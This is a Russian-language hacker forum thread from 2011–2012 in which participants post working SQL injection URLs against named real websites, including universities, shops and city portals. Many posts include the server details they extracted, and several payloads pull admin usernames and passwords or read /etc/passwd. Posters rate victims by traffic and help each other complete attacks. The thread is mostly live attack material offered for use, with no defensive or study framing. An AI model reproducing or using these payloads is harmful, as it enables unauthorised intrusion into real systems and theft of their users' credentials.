http://www.kid-market.ru/catalogue/detail/?catalogue_id=604&item_id=99999999/**/UnIoN/**/SeLeCt/**/concat_ws%280x3a,user%28%29,database%28%29,version %28%29%29--+
children_ro@localhost:children:5.1.22-rc
Code:
http://www.kid-market.ru/catalogue/detail/?catalogue_id=604&item_id=99999999/**/UnIoN/**/SeLeCt/**/group_concat(0x3a,id)/**/FrOm/**/it_item--+
aydin-ka
19.12.2011, 23:29
Code:
http://charufa.ru/index.php?categoryID=233+and+%28select+1+from+%28s elect+count%280%29,concat%28%28select+version%28%2 9%29,floor%28rand%280%29*2%29%29+from+%28select+1+ union+select+2+union+select+3%29x+group+by+2+limit +1%29a%29
5.0.26-log
Cennarios
20.12.2011, 05:18
Profit = )
http://www.eclipse.org/membership/showMember.php?member_id=930+and+substring%28@@ver sion,1,1%29+LIKE+5
Version: 5
User: http_user@node-www-vm3.eclipse.org
Code:
http://online.famoustravel.gr/res.php?id=-2748+union+select+1,2,3,unhex%28hex%28group_concat %28table_name%29%29%29,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,51,53,54,55,56,57+from+information_schema .tables%20--+
5.04.77
Code:
http://www.acor.org/news/display.html?id=-10147+UNION+SELECT+concat_ws(0x3a,user(),version() ,database()),2,3,4--
root@10.10.10.36:5.1.51-community:news
GooglePR: 6
exploit3602
22.12.2011, 22:51
Code:
http://www.goodfishing.ru/show_cat2.php?grid=-3+union+select+concat_ws(0x3a,version(),user(),dat abase())--
5.0.90-log:u23641@10.8.0.145:u23641_10
Code:
http://netcomtraining.co.uk/content.php?id=-52+union+select+1,concat_ws(0x3a,version(),user()) ,3,4,5,6,7,8,9,10,11,12,13,14,15--
5.0.92-community:webdesig_netrt@server213-171-218-137.livedns.org.uk
Expl0ited
23.12.2011, 00:00
Code:
GET http://banki.probit.ru/error.php HTTP/1.1
Host: banki.probit.ru
User-Agent: 'div(select(x)from(select(count(*)),concat((select version()),0x00,floor(rand(0)*2))x from information_schema.tables group by x)a)!=!!!'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://banki.probit.ru/
Content-Type: application/x-www-form-urlencoded
Content-Length: 20
Ошибка: Duplicate entry '5.0.51a-24+lenny3' for key 1
HTML:
http://www.dartmouth.edu/~dccc/profile.php?id=1'+and+1=01+union+select+version(), 2,user(),database(),5,6,7,8,9,10,11,12,13,14,15,16--+f
Version: 5.0.77-log
User:dccc@taygete.Dartmouth.EDU
Database: dccc_db
--------------------------------------------------------
Code:
http://www.elps.hs.iastate.edu/faculty.php?id=-1+union+select+1,version(),user(),4,5,database(),7 ,8,9,10,concat(user_login,0x3a,user_pass),12+from+ wp_users+limit+0,1
Version: 5.0.77-log
User: elps@webdev5.its.iastate.edu
Database: elps
Смотрим запрос, no comments
exploit3602
23.12.2011, 09:38
Code:
http://www.eclbl.com/special.php?id=-7+union+select+1,2,3,4,concat_ws(0x3a,database(),u ser(),version())--
eclblcom_special:eclblcom@localhost:5.1.60-community-log
Code:
БОЯН
Code:
http://www.kyivflorist.com/a-price/group.php?groupid=-2+union+select+1,concat_ws(0x20,user(),database(), version()),3,4,5,6--
kyivflor_kyivflo@localhost kyivflor_kyivflorist 5.0.92-community
Code:
http://avenirshoes.ru/index.php?s=-1+and+1=1+union+select+version()--+f
Code:
http://www.topup.com.my/product.html?category_id=-1+union+/*!select*/+1,2,3,4,5,unhex(hex(tAbLE_NaME)),7,8+from+informa tion_schema./**/tables+limit+0,1--+f
aydin-ka
24.12.2011, 01:09
тИЦ 325
Code:
http://www.offpoly.ru/news/index.php?id=-1%27/*--*/UnIoN/*--*/SeLeCt/*--*/1,2,3,4,5,file_priv,7,8,9/*--*/FrOm/*--*/mysql.user--+
Y
Code:
http://www.offpoly.ru/news/index.php?id=-1%27/*--*/UnIoN/*--*/SeLeCt/*--*/1,2,3,4,5,group_concat%280x3a,login,email%29,7,8,9/*--*/FrOm/*--*/users--+
Skofield
25.12.2011, 04:25
Code:
http://finaid.fiu.edu/index.php?id=1319&tx_dmmjobcontrol_pi1%5Bjob_uid%5D=-113+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,conc at_ws(0x3a,version(),user(),database()),15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32/*
тиц 1300
Code:
http://www.xakep.ru/vulnerability/Mybb%27And/**/1=2/**/UnIoN/**/SeleCt/**/1,2,3,4,5,6,@@version,8,9,10,11,12--/
Code:
http://www.baacouncil.org/index.php?m=-32+union+select+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3--
d10404sa13543@sn13.zone.eu:5.1.37-log:d10404sd8108
GooglePR: 7
Эскорт-сервис
Code:
http://www.avaescorts.com/escorts-by-type?id=123'+/*!union*/+select+1,/*!concat*/(username,0x3a,password),3,4,5,6+from+ava_is2008.a dmin+limit+1,1--+f
Сеть городских порталов вРоссии.
вОрле тиц/пр 500/5
HTML:
http://www.vor[в*опе]le.ru/q/?id_dl=1+union+select+1,2,concat(mail,0x3a,pass),4 ,5,6,7,8,9,10+from+user
вТуле тиц/пр 400/6
HTML:
http://vtul[в*опе]e.ru/q/?id_dl=1+union+select+1,2,concat(mail,0x3a,pass),4 ,5,6,7,8+from+user
вЛипецке тиц/пр 400/5
HTML:
http://goro[в*опе]dlip.ru/q/?id_dl=1+union+select+1,2,concat(mail,0x3a,pass),4 ,5,6,7,8+from+user
вКурске тиц/пр 275/5
HTML:
http://vkur[в*опе]ske.com/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,load_file(0x2F657 4632F706173737764)--
вБелгороде тиц/пр 130/5
HTML:
http://vbelgo[в*опе]rode.com/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,load_file(0x2F657 4632F706173737764)--
вБрянске тиц/пр 230/5
HTML:
http://vbrya[в*опе]nske.com/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,load_file(0x2F657 4632F706173737764)--
вКалуге тиц/пр 30/5
HTML:
http://www.vkalu[в*опе]ge.ru/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,load_file(0x2F657 4632F706173737764)--
вВоронеже тиц/пр 300/5
HTML:
http://vvoron[в*опе]ezhe.ru/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,count(pass)+from+ user--
вРязани тиц/пр 40/5
HTML:
http://www.vrya[в*опе]zani.ru/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,count(pass)+from+ user--
вСмоленске тиц/пр 40/5
HTML:
http://www.vsmol[в*опе]enske.ru/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,load_file(0x2F657 4632F706173737764)--
вТвери тиц/пр 50/5
HTML:
http://www.vtv[в*опе]eri.ru/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,load_file(0x2F657 4632F706173737764)--
вЯрославле тиц/пр 30/5
HTML:
http://www.vyarosl[в*опе]avle.ru/q/?id_dl=-1+union+all+select+1,2,3,4,5,6,7,count(pass)+from+ user--
http://tm.ua/show_news.php?who=0%20union%20select%201,2,3,versi on(),5,6
тиц 90
http://www.sigma-soft.ru/news_vad.shtml?sec=news_vad&id=-1324892363%20union%20select%201,concat_ws(0x3a,@@v ersion,user(),database()),3+--
4.1.22 bsd@localhost ru_sigma-soft_www
http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345 and 1=2
тИц - 1К
shadowrun
27.12.2011, 00:57
http://www.forakom.ru/tree/index.php?brand_id=739&model_id=5533&engine_id=1005635+or+1+group+by+concat%28version%2 8%29,floor%28rand%280%29*2%29%29having+min%280%29+ or+1--+
5.0.67-log1
Code:
http://rstomat.ru/qwe.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5--+
Code:
http://rosprofbuh.ru/qwe.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5--+
Code:
http://www.centerforsustainability.org/resources.php?category=-10+UNION+SELECT+1,concat_ws%280x3a,user%28%29,vers ion%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12--&root=10
sustainability@localhost:5.0.89-log:sustainability
GooglePR: 5
Code:
http://www.onlyfunimages.com/view.php?id=-70+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29, version%28%29,database%28%29%29,5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23+from+admin--
onlyfun_OFI@localhost:5.0.92-communitynlyfun_OFI
GooglePR: 6
HellFire
27.12.2011, 14:27
Code:
http://www.kokoliko.com/classifieds_ad.php?num=666+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,AES_DECRYPT( AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Vers ion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x78 73716C696E6A656E64),0x71),0x71),21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40--
Социальная сеть Ганы
Database Version: 5.1.60-community-log
Database name: thetrack_tv
User name: thetrack_corn@localhost
stepashka_
27.12.2011, 17:57
http://shchelkovo-net.ru/art.php?id=102' - скуля
http://shchelkovo-net.ru/art.php?id=-102'+Union+select+version(),2+--+ - версия вывод в тайтле
http://shchelkovo-net.ru/art.php?id=-102'+Union+select+concat_ws(0x3a,username,user_pas sword),2+from+for.phpbb_users--+ - выводим юзеров
http://www.dedalusbooks.com/catalog.php?id=9999999+union+select+1,2,3,4,5,6,7, 8,9,10,11,12,13,14,15+from+INFORMATION_SCHEMA.TABL ES+--+
spherics
27.12.2011, 22:33
http://www.gucomics.com/comic/?cdate=-20000710+union+select+1,concat_ws(0x3a3a,version() ,user(),database()),3,4,5--
Version:5.0.77-log
User: guadmin@10.8.175.194
Database:gucomics_main
http://www.gugaming.com/news/article.php?id=-15024+union+select+1,concat_ws(0x3a3a,version(),us er(),database()),3,4,5,6,7,8,9,10--
Version:5.0.22
User: guadmin@localhost
Database: guforums
http://www.caddyforacure.com/auction_details.php?AuctionID=14/**/or(1)group%09by%0Aconcat((/*!select*/(version())/*!fRom*/(information_schema.tables)limit/**/0,1),rand(0)|0)+having+max(0)#
aydin-ka
30.12.2011, 19:43
ТИЦ 700
Code:
http://hvacnews.ru/reviews/index.php?id=999999999+union+select+1,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29,3, 4,5,6--+
root@localhost:hvacnews:4.1.22
Code:
http://hvacnews.ru/reviews/index.php?id=999999999+union+select+1,group_concat %280x3a,status,email%29,3,4,5,6+from+users--
Code:
http://green-wind.ru/foto2.php?id=99999999+union+select+@@version,2,3,4 ,5,6,7,8--+
5.0.92-log
Code:
http://green-wind.ru/foto2.php?id=99999999+union+select+group_concat(ta ble_name),2,3,4,5,6,7,8+from+information_schema.ta bles--+
alias6969
01.01.2012, 14:27
5.0.92-community:portalme_alibaba@localhost:portalme_alib aba
Code:
http://www.portalmercosur.com/buy.php?row=4&id=-1+union+antidef+select+1,2,concat_ws(0x3a,username ,password),4,5,6,7,8+from+odmin+--+
Code:
http://www.ladyfest.com.ua/index.php?page_id=7&news_id=20'-999.9+union+select+1,2,3,4--
http://www.apserver.org.ua/forum.php?d=view&fid=5'&tid=141-999.9+union+select+1,2,3,4,5,6,7--
http://shop.lepel.by/shop_view.php?cat=11'&id=2913-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20--
http://www.zorat.com.ua/view_page.php?id_radius=15&znath=5x139.7.'-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12--
http://shop.lepel.by/shop_view2.php?firm=28&cat=11'&id=2992-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20--
http://klm.net.ua/view_post.php?cat=27'-999.9+union+select+1,2,3,4--
http://www.motoextreme.spb.ru/catalog.php?type=1'&trademark=41&subtype=59&mode=1-999.9+union+select+1,2,3,4,5,6,7,8,9--
http://vuliktoys.com.ua/index.php?option=com_content&view=category&id=2&Itemid=6&lang=uk'-999.9+union+select+1,2,3,4--
http://sibregion.ru/?module=links&part=go'&link=73358-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11--
aydin-ka
02.01.2012, 00:29
тИЦ 325
Code:
http://estima.ru/?DTBrand=4045&action=DAProduct7&EstimaProduct=999999999/*--*/union/*--*/select/*--*/1,2,concat_ws%280x3a,user%28%29,database%28%29,ver sion%28%29%29--
estima@localhost:estima:5.1.56
Code:
http://estima.ru/?DTBrand=4045&action=DAProduct7&EstimaProduct=999999999/*--*/union/*--*/select/*--*/1,2,File_Priv/*--*/from/*--*/mysql.user--
N
Code:
http://estima.ru/?DTBrand=4045&action=DAProduct7&EstimaProduct=999999999/*--*/union/*--*/select/*--*/1,2,group_concat%28column_name%29/*--*/from/*--*/DTAddressCatalog--
HellFire
02.01.2012, 08:02
Code:
http://www.gogojewelry.com/enlarge.php?num=666-666.666+UNION+SELECT+1,CONCAT(0x7873716C696E6A6265 67696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F, User(),0x7873716C696E6A656E64),3,4,5,6,7,8,9,10,11 ,12,13--
Шоп ювелирка, в базе ничего интересного
Database Version: 5.0.91-log
Database name: GogoAdmin
User name: GogoAdmin@72.167.232.18
stepashka_
02.01.2012, 12:44
http://3dsart.ru/?view=razdel&razID=-2+union+select+concat_ws(0x3a,user(),version(),dat abase()),2,3,4+--+
read_aleks@localhost:5.1.56-log:read_3dsartDB
Code:
http://www.crownofmaine.com/maine-products/product_detail.php?id=786-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17-- (Blind Injection)
http://www.ath-elite.com.au/trainers.php?id=25-999.9+union+select+1,2,3,4,5-- (MYSQL Injection)
http://www.middlehamparkracing.net/horse.php?id=61-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12-- (Blind Injection)
http://www.lpoolcomp.co.uk/news.php?id=1037-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11-- (MYSQL Injection)
http://www.huntearth.com/related_links.php?ID=11708-999.9+union+select+1,2,3,4,5-- (MYSQL Injection)
http://www.lccc.co.uk/index.php?p=news%26id=1734-999.9+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28 (MSSQL Injection)
BLurpi^_^
02.01.2012, 16:07
pr:3
http://www.freegamesonline.cz/game.php?id=-692+union+select+1,group_concat(0x3C494E4A5F494E46 4F3E,user(),0x3a,database(),0x3a,version(),0x3C494 E4A5F494E464F3E),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32, 33,34--
http://www.naturally-healthy.info/view_product.php?id=-104+union+select+group_concat(0x3C494E4A5F494E464F 3E,user(),0x3a,database(),0x3a,version(),0x3C494E4 A5F494E464F3E),2,3,4,5,6,7,8--
http://www.teletech.bg/view_product.php?id=-2+union+select+1,group_concat(0x3C494E4A5F494E464F 3E,user(),0x3a,database(),0x3a,version(),0x3C494E4 A5F494E464F3E),3,4,5,6,7--
http://www.fesko.com.ua/a-news/news.php?id=5+union+select+1,2,3,group_concat(0x3C 494E4A5F494E464F3E,user(),0x3a,database(),0x3a,ver sion(),0x3C494E4A5F494E464F3E),5,6,7,8,9,10--
Osstudio
03.01.2012, 00:08
http://er-region.ru/about/projects/news/?id=220+and+1=0+union+select+1,2,group_concat%28co lumn_name+separator+0x3c62723e%29,4+from+informati on_schema.columns+where+table_name=0x625f666f72756 d5f656d61696c--/
Дед мороз - единорос...
Чтобы не быть голословным:
Code:
http://www.grupotvcable.com.ec/tvcable/ppv/ver/-147381+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13, 14,15,16,17,18,19,20--+f
P.S. Сайт кстати траффистый
HellFire
03.01.2012, 18:24
http://theweekly.usc
.edu
/detail.php?recordnum=17510-999.9+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,CONCAT( 0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Da tabase(),0x2F2A2A2F,User(),0x7873716C696E6A656E64) ,13,14,15,16--
Database Version: 5.0.87-community-nt
Database name: hscweekly
User name: hscweekly@localhost
Университет (Южная Калифорния)
ТИЦ: 1100
PR: 8
Code:
http://spenserians.cath.vt.edu/TextRecord.php?action=GET%26textsid=34105-000.001+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRY PT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2 F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696 E6A656E64),0x71),0x71),6,7,8,9,10,11,12,13,14,15,1 6,17,18,19--
Database Version: 5.0.92-log
Database name: spenserians
User name: spens_admin@localhost
Технологический университет (Вирджиния)
ТИЦ: 850
PR: 8
тИЦ 40
Code:
http://ochki.intermoda.ru/pro/?s=-19+union+select+1,2,3,concat(login,0x3a,pass),5,6, 7,8,9,10,11+from+Partner--+f
jecka3000
03.01.2012, 23:43
Code:
http://www.hollowaysofludlow.com/look.php?P1=-4'+union+select+1,2,3,concat(version(),0x20,databa se(),0x20,user()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32--+
5.0.77
DeveolpmentHolly
devholly@localhost
Code:
http://needthelook.com/look.php?id=-8153+union+select+1,2,concat(version(),0x20,databa se(),0x20,user()),4,5,6,7,8,9,10,11,12--
5.0.91-log
db387346179
dbo387346179@212.227.114.156
Code:
http://evergreenmtb.org/recreation/calendar.php?event_id=-9874+UNION+SELECT+1,2,3,concat_ws(0x3a,user(),vers ion(),database()),5,6,7,8,9,10,11,12,13,14,15,16,1 7--
evgnweb@marv.dreamhost.com:5.1.53-log:bbtc
GooglePR: 5
PR 8
http://www.usc.es/ceta/novas/nova.php?id_nova=-84+union+select+1,2,3,version(),5,6,7--
version: 5.0.51a-24+lenny5-log
тиц 10 pr 5
Code:
http://www.talendforge.org/forum/viewtag.php?id=124-999.9+union+select+1,2,3,4,5,6,7--
тиц 180 pr 6
Code:
http://www.slax.org/forum.php?action=view%26parentID=44538-999.9+union+select+1,2,3,4--
тиц 0 pr 4
Code:
http://forum.linux.or.id/viewforum.php?f=16-999.9+union+select+1,2,3,4--
тиц 10 pr 4
Code:
http://www.archemix.com/website/_popup_press_release.php?release=48-999.9+union+select+1,2,3,4,5,6,7,8--
Code:
http://www.ismashmedia.com/videos/watch.php?id=341%26amp%3bvideo=The-Muppets-(2011-999.9+union+select+1,2,3,4,5,6,7,8,9,10--
тиц 0 pr 4
Code:
http://www.firstcallmedical.co.uk/detail.php?page=division%26id=1-999.9+union+select+1,2,3,4,5,6,7--
nemaniak
06.01.2012, 04:13
augeo-foundation.nl PR-5
Code:
http://www.augeo-foundation.nl/flash/mypage.php?id=-27+union+select+concat_ws(0x3a,version(),user(),da tabase()),2+--+
Code:
5.0.32-Debian_7etch8-log:marijnb5_augeoa@wh-www4.xs4all.nl:marijnb5_augeo
promoultra.com ~1к уников
Code:
http://www.promoultra.com/modules/catalog/print.php?ItemId=100215+and+5=substring((SELECT+ve rsion()),1,1)+--+
-- true
Code:
http://www.promoultra.com/modules/catalog/print.php?ItemId=100215+and+4=substring((SELECT+ve rsion()),1,1)+--+
-- false (редирект)
unic.ru тиц-300 Информационный центр ООН в Москве
Code:
http://www.unic.ru/news_pres/viewer.php?uid=54 AND 1=2 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database())#
Code:
4.0.27-log:unic@pm2.zenon.net:unic
Тиц 10 ПР 4
Code:
http://www.myhomeremedies.com/topic.cgi?topicid=91-999.9+union+select+1,2,3,4,5,6,7--
FederalPost - сетевое информационное издание
тИЦ 850, в день 1-2к трафа
Code:
http://www.federalpost.ru/russia/issue_-38614+union+select+1,2,version(),4,5,6--+f.html
Version(): 4.0.26-standard
OS: Linux regions 2.4.20-8smp #1 SMP Thu Mar 13 17:45:54 EST 2003 i686
BLurpi^_^
07.01.2012, 03:21
PR:4
http://www.menabizparks.com/ang/detail_event.php?id=62+union+select+1,2,group_conc at(0x3C494E4A5F494E464F3E,user(),0x3a,database(),0 x3a,version(),0x3C494E4A5F494E464F3E),4,5,6,7,8,9, 10,11,12,13--
PR:2
http://www.runningmyraces.com/event.php?id=2703+union+select+1,2,3,4,group_conca t(0x3C494E4A5F494E464F3E,user(),0x3a,database(),0x 3a,version(),0x3C494E4A5F494E464F3E),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20--
http://www.russophobia.ru/events/event.php?id=-101+union+select+group_concat(0x3C494E4A5F494E464F 3E,user(),0x3a,database(),0x3a,version(),0x3C494E4 A5F494E464F3E),2,3,4,5,6,7,8,9--
PR:4
http://www.baileypub.com/pg_event.php?id=69+union+select+1,group_concat(0x3 C494E4A5F494E464F3E,user(),0x3a,database(),0x3a,ve rsion(),0x3C494E4A5F494E464F3E),3,4,5--
ТИЦ:20
ПР:4
http://www.ibiza-voice.com/event/event.php?id=-183+union+select+1,group_concat(0x3C494E4A5F494E46 4F3E,user(),0x3a,database(),0x3a,version(),0x3C494 E4A5F494E464F3E),3,4,5,6,7,8,9,10,11,12,13,14,15,1 6,17--
Тиц - 20
PR - 2
http://www.sppk.ru/?pid=1&gid=-10%29+union+select+1,2,3,4,5,6
ТиЦ 250
Pr 4
Code:
http://www.decima.ru/et/article.html?di=-180'+union+select+1,2,3,4,5,6,concat_ws(0x3a,versi on(),user()),8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6 ,7--+
HellFire
08.01.2012, 12:02
Сайт поддержки сервис-инженеров и пользователей Контрольно-Кассовых Машин.
Code:
http://www.kkm.info/myboard/viewthread.php?number=1000-999.9+UNION+SELECT+1,2,3,4,5,6,7,AES_DECRYPT(AES_E NCRYPT(CONCAT(0x7873716C696E6A626567696E,Version() ,0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716 C696E6A656E64),0x71),0x71),9,10,11--
Вывод в титле.
Database Version: 4.1.25
Database name: kkminfo5_kkm9
User name: root@localhost
PR: 2
ТИЦ: 160
Университет (Калифорния)
Code:
http://datause.cse.ucla.edu/library_results.php?q=herman&c=&id=100-0.01+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONC AT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F ,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E 64),0x71),0x71),4,5,6,7,8,9--
File_Priv = Y
Database Version: 5.5.13
Database name: datause
User name: root@localhost
PR: 8
ТИЦ: 1500
Pirotexnik
09.01.2012, 00:15
Code:
http://www.acnstudios.com/bizdirect/page.php?id=-1+aNd+%281%29/**/=/**/%281%29+union+select+1,2,3,4,5,concat_ws%280x3a,lo gin,pass,salt%29,7,8,9,10,11,12+from+pmd_users+lim it+0,1/**/--+
Osstudio
09.01.2012, 01:00
http://autoklimat.info/?p=3%27+and+1=0+union+select+group_concat%28column _name+separator+0x3c62723e%29+from+information_sch ema.columns+where+table_name=0x77735f6c657632+--+
HellFire
09.01.2012, 11:06
Путеводитель по ресторанам
Code:
http://www.restop.ru/restcard.php?num=631-000.001+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CON CAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,Use r()),0x71),0x71),3,4,5,6--
Вывод в титле.
Database Version: 5.1.57
Database name: delinformcopy
User name: delokop@localhost
PR: 4
ТИЦ: 150
А вот эти пасаны занимаются IT безопасностью авиационно-космических систем...печаль
Code:
http://www.ireth.net/newsExt.php?id=15-000.001+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,AE S_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A62656 7696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,U ser(),0x7873716C696E6A656E64),0x71),0x71),14,15,16--
Database Version: 5.0.92-enterprise-gpl-log
Database name: Sql196053_2
User name: Sql196053@62.149.141.81
PR: 3
ТИЦ: 0
И еще одни IT безопасники...
Code:
http://www.ithealth.co.uk/page.php?id=134-0.1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(CONCAT(Ve rsion(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0 x71),0x71),2,3,4--
Вывод в титле.
Database Version: 4.0.24-log
Database name: user12315203_1
User name: user12315203_1@cpanel19.uk2.net
PR: 2
ТИЦ: 0
Code:
http://www.mitropolia-ardealului.ro/eparhii.php?id=14+and+1=0+union+select+1,version()
pr: 4
Code:
http://www.emobila.ro/detalii_subcats.php?idfirma=-68+union+select+1,2,3,parola,5,6,7,8,9,10+from+use ri+limit+0,1--
Code:
http://www.barnabas.nu/nederlands/page.php?id=-4+union+select+1,2,table_name,4,5,6+from+informati on_schema.tables+limit+28,1--
Code:
http://www.e-wigs.com/wigs.php?id=-489+union+select+1,2,3,4,5,version(),7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25--
4 версия
Pirotexnik
09.01.2012, 19:13
http://94.75.242.197/index.php?langid=-2/*!union*//*--*//*!select*//*--*/unhex%28hex%28concat_ws%280x3a,user,pass%29%29%29+ from+adm+limit+0,1+--#/*
Code:
http://supercica.com/prikaz.php?id=18+and+1=0+union+select+1,unhex(hex( concat_ws(0x3a,amd_pass,adm_username))),3,4,5,6+fr om+supercic_uchkur.administratori+limit+0,1--
Code:
http://www.seiko.es/news/news.php?id=-25+union+select+1,2,3,4,5,6,version(),8,9,10--
Code:
http://www.hvqagency.com/view_model.php?model_id=261+union+select+1,table_n ame,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,3 7+from+information_schema.tables+limit+1,1--
Code:
http://davidcrocker.com/info.php?info_id=-1+union+select+1,2,3,4,5,6,7,version(),9,10,11,12, 13,14,15/*
Code:
http://www.crunch.org.uk/charity.php?CharityID=-5+union+select+1,2,3,4,version(),6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49--
Code:
http://www.misionescuatro.com/ampliar.php?id=-15271+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,17--
d1v, не чекнул я на бояны, да
Сайтец о зароботке денег в интернете.
Code:
http://www.howtoberich.ru/blog_view_post.php?id=-97+union+select+1,version(),3,4,5%20--
Какой то фанатский клуб
Code:
http://www.dcucenter.com/event.php?id=-657+union+select+1,version()29,3,4,5,6,7,8,9,10,11 --
Code:
http://tv.powernet.com.ru/tv.php?tv=-1+union+all+select+1,2,3,4,5,6,version%28%29,8,9--
Code:
http://www.motosport.in32.ru/production.php?model=-348
Дальше к сожалению разобрать не смог
Хотя сканер говорит
OK! Find 1 columns. Right URL: http://www.motosport.in32.ru/production.php?model=-348%20UNION%20SELECT%201/*
Кто сможет сообщите пожалуйста или подскажите в какую сторону копать !
mup4uk said:
Code:
http://www.motosport.in32.ru/production.php?model=-348
Дальше к сожалению разобрать не смог
Хотя сканер говорит
Кто сможет сообщите пожалуйста или подскажите в какую сторону копать !
Code:
http://www.motosport.in32.ru/production.php?model=-348+union+select+1,2,3,4,user(),database(),version (),8,9,10,11,12,13,14,15,16--+f
Pirotexnik
11.01.2012, 21:32
http://docareer.org/news/news_report.php?key=%27+union+select+1,user%28%29+--+
Экскурсии по африке вроде
Code:
http://www.astroafricaeu.com/event.php?id=-1+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12 ,13,14+from+information_schema.tables+limit+0,10%2 0--
Интернет магазин одеял, подушек, и т.д (UA)
Code:
http://constancy.com.ua/view_items.php?catid=-1+union+select+1,version(),3 --
Клуб знатаков
Code:
http://www.chgk.com.ru/person.php?id=-360+union+select+1,2,3,4,table_name,6,7+from+infor mation_schema.tables%20--
Грибная энциклопедия
Code:
http://gribnikam.com/show_cat.php?catid=-1+union+select+table_name+from+information_schema. tables+limit+1,10
ТиЦ- 10
PR - 2
Code:
http://www.hesa.ac.uk/index.php?option=com_pubs&Itemid=122&task=show_year&pubId=1714&versionId=23&yearId=-161+UNION+SELECT+1,2,3,concat_ws%280x3a,user%28%29 ,version%28%29,database%28%29%29,5,6,7,8,9,10,11,1 2,13,14,15,16,17--
joomla_working@10.128.0.41:5.0.67-community-logrod-www
GooglePR: 8
Онлайн Магазин
Code:
http://www.smokenator.com/store/products.php?catID=-1+union+select+1,2,version(),4--
PR = 3
stepashka_
13.01.2012, 16:33
http://www.jkt-company.ru/cat.php?id=-1044+union+select+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0+--+
5.0.90:u33665@78.108.84.21:b33665_cat
http://www.2mpz.ru/cat.php?id=-62+union+select+1,2,3,table_name,5,6,7+from+inform ation_schema.tables+--+
Есть табла sys_umusers в ней users_name и users_password
http://www.npfpol.ru/cat.php?file_id=119&id=-140+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8+--+
4.0.27-log:npfpol10_cat6@217.112.37.43:npfpol10_cat6
stepashka_
13.01.2012, 17:44
http://incognita-terra.ru/cat.php?id=17+union+select+1,concat_ws(0x3a,versio n(),user(),database()),3,4,5,6,7,8,9+--+
5.0.90:barabaka@localhost:incognita
http://biatlonland.ru/cat.php?id=5+union+select+1,concat_ws(0x3a,version (),user(),database()),3,4,5,6,7,8,9,0,1,2,3,4+--+
